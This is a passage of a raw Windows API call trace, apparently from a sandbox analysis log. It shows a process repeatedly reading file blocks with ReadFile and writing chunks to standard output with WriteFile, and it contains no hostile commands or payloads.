_get_osfhandle (_FileHandle=1) returned 0x50 [0211.150] WriteFile (in: hFile=0x50, lpBuffer=0x2af164*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af164*, lpNumberOfBytesWritten=0x2ae168*=0x20, lpOverlapped=0x0) returned 1 [0211.150] _get_osfhandle (_FileHandle=4) returned 0x58 [0211.150] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae154 | out: lpNewFilePointer=0x0) returned 1 [0211.150] _get_osfhandle (_FileHandle=4) returned 0x58 [0211.150] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.150] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.150] GetFileType (hFile=0x50) returned 0x1 [0211.150] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.150] GetFileType (hFile=0x50) returned 0x1 [0211.150] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.150] WriteFile (in: hFile=0x50, lpBuffer=0x2aef84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.150] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.150] GetFileType (hFile=0x50) returned 0x1 [0211.150] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.150] WriteFile (in: hFile=0x50, lpBuffer=0x2aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.150] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.150] GetFileType (hFile=0x50) returned 0x1 [0211.150] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.150] WriteFile (in: hFile=0x50, lpBuffer=0x2af024*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af024*, 
lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.150] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.151] GetFileType (hFile=0x50) returned 0x1 [0211.151] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.151] WriteFile (in: hFile=0x50, lpBuffer=0x2af074*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af074*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.151] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.151] GetFileType (hFile=0x50) returned 0x1 [0211.151] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.151] WriteFile (in: hFile=0x50, lpBuffer=0x2af0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af0c4*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.151] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.151] GetFileType (hFile=0x50) returned 0x1 [0211.151] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.151] WriteFile (in: hFile=0x50, lpBuffer=0x2af114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af114*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.151] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.151] GetFileType (hFile=0x50) returned 0x1 [0211.151] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.151] WriteFile (in: hFile=0x50, lpBuffer=0x2af164*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af164*, lpNumberOfBytesWritten=0x2ae168*=0x20, lpOverlapped=0x0) returned 1 [0211.151] _get_osfhandle (_FileHandle=4) returned 0x58 [0211.151] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae154 | out: lpNewFilePointer=0x0) returned 1 [0211.151] _get_osfhandle (_FileHandle=4) returned 0x58 [0211.151] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, 
lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.151] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.151] GetFileType (hFile=0x50) returned 0x1 [0211.151] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.151] GetFileType (hFile=0x50) returned 0x1 [0211.151] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.151] WriteFile (in: hFile=0x50, lpBuffer=0x2aef84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.151] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.151] GetFileType (hFile=0x50) returned 0x1 [0211.151] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.151] WriteFile (in: hFile=0x50, lpBuffer=0x2aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.151] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.151] GetFileType (hFile=0x50) returned 0x1 [0211.151] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.152] WriteFile (in: hFile=0x50, lpBuffer=0x2af024*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af024*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.152] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.152] GetFileType (hFile=0x50) returned 0x1 [0211.152] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.152] WriteFile (in: hFile=0x50, lpBuffer=0x2af074*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af074*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.152] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.152] GetFileType (hFile=0x50) returned 0x1 [0211.152] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.152] WriteFile (in: 
hFile=0x50, lpBuffer=0x2af0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af0c4*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.152] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.152] GetFileType (hFile=0x50) returned 0x1 [0211.152] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.152] WriteFile (in: hFile=0x50, lpBuffer=0x2af114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af114*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.152] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.152] GetFileType (hFile=0x50) returned 0x1 [0211.152] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.152] WriteFile (in: hFile=0x50, lpBuffer=0x2af164*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af164*, lpNumberOfBytesWritten=0x2ae168*=0x20, lpOverlapped=0x0) returned 1 [0211.152] _get_osfhandle (_FileHandle=4) returned 0x58 [0211.152] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae154 | out: lpNewFilePointer=0x0) returned 1 [0211.152] _get_osfhandle (_FileHandle=4) returned 0x58 [0211.152] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.152] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.152] GetFileType (hFile=0x50) returned 0x1 [0211.152] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.152] GetFileType (hFile=0x50) returned 0x1 [0211.152] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.152] WriteFile (in: hFile=0x50, lpBuffer=0x2aef84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.152] _get_osfhandle 
(_FileHandle=1) returned 0x50 [0211.152] GetFileType (hFile=0x50) returned 0x1 [0211.152] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.152] WriteFile (in: hFile=0x50, lpBuffer=0x2aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.153] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.153] GetFileType (hFile=0x50) returned 0x1 [0211.153] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.153] WriteFile (in: hFile=0x50, lpBuffer=0x2af024*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af024*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.153] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.153] GetFileType (hFile=0x50) returned 0x1 [0211.153] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.153] WriteFile (in: hFile=0x50, lpBuffer=0x2af074*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af074*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.153] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.153] GetFileType (hFile=0x50) returned 0x1 [0211.153] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.153] WriteFile (in: hFile=0x50, lpBuffer=0x2af0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af0c4*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.153] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.153] GetFileType (hFile=0x50) returned 0x1 [0211.153] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.153] WriteFile (in: hFile=0x50, lpBuffer=0x2af114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af114*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.153] _get_osfhandle (_FileHandle=1) returned 0x50 
[0211.153] GetFileType (hFile=0x50) returned 0x1 [0211.153] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.153] WriteFile (in: hFile=0x50, lpBuffer=0x2af164*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af164*, lpNumberOfBytesWritten=0x2ae168*=0x20, lpOverlapped=0x0) returned 1 [0211.153] _get_osfhandle (_FileHandle=4) returned 0x58 [0211.153] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae154 | out: lpNewFilePointer=0x0) returned 1 [0211.153] _get_osfhandle (_FileHandle=4) returned 0x58 [0211.153] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.153] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.153] GetFileType (hFile=0x50) returned 0x1 [0211.153] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.153] GetFileType (hFile=0x50) returned 0x1 [0211.153] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.153] WriteFile (in: hFile=0x50, lpBuffer=0x2aef84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.154] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.154] GetFileType (hFile=0x50) returned 0x1 [0211.154] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.154] WriteFile (in: hFile=0x50, lpBuffer=0x2aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.154] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.154] GetFileType (hFile=0x50) returned 0x1 [0211.154] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.154] WriteFile (in: hFile=0x50, lpBuffer=0x2af024*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, 
lpOverlapped=0x0 | out: lpBuffer=0x2af024*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.154] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.154] GetFileType (hFile=0x50) returned 0x1 [0211.154] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.154] WriteFile (in: hFile=0x50, lpBuffer=0x2af074*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af074*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.154] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.154] GetFileType (hFile=0x50) returned 0x1 [0211.154] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.154] WriteFile (in: hFile=0x50, lpBuffer=0x2af0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af0c4*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.154] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.154] GetFileType (hFile=0x50) returned 0x1 [0211.154] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.154] WriteFile (in: hFile=0x50, lpBuffer=0x2af114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af114*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.154] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.154] GetFileType (hFile=0x50) returned 0x1 [0211.154] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.154] WriteFile (in: hFile=0x50, lpBuffer=0x2af164*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af164*, lpNumberOfBytesWritten=0x2ae168*=0x20, lpOverlapped=0x0) returned 1 [0211.154] _get_osfhandle (_FileHandle=4) returned 0x58 [0211.154] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae154 | out: lpNewFilePointer=0x0) returned 1 [0211.154] _get_osfhandle (_FileHandle=4) returned 0x58 [0211.154] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, 
nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.155] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.155] GetFileType (hFile=0x50) returned 0x1 [0211.155] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.155] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.156] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.156] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.156] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.156] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.156] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.156] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, 
lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.156] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.156] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.156] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.157] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.157] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.157] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.157] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.157] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.157] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: 
lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.157] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.157] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.157] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.157] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.157] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.157] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.158] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.158] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.158] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, 
lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.158] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.158] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.158] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.158] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.158] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.158] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.158] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.158] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.159] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, 
lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.159] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.159] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.159] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.159] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.159] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.159] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.159] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.159] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.159] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, 
